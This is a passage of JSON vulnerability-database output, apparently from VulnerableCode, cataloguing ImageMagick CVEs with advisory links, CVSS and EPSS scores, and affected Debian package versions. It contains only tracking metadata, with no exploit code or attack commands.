"scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2054611" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-4219" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p4yb-mqca-v7c8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81970?format=api", "vulnerability_id": "VCID-p6m5-ntbm-auct", "summary": "ImageMagick: outside the range of representable values of type 'float' at MagickCore/quantum.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27767.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27767.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27767", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24834", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24954", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24729", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24796", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24841", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24855", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24816", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24759", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.2477", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24762", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24678", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27767" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27767", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27767" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894687", "reference_id": "1894687", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894687" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27767" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p6m5-ntbm-auct" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79203?format=api", "vulnerability_id": "VCID-pj8s-qad1-6qdu", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13306.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13306.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.001", "scoring_system": "epss", "scoring_elements": "0.27616", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.001", "scoring_system": "epss", "scoring_elements": "0.27668", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28209", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28252", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28042", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28108", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28151", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28159", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28115", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28058", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28069", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28052", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28136", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730357", "reference_id": "1730357", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730357" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931449", "reference_id": "931449", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931449" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": 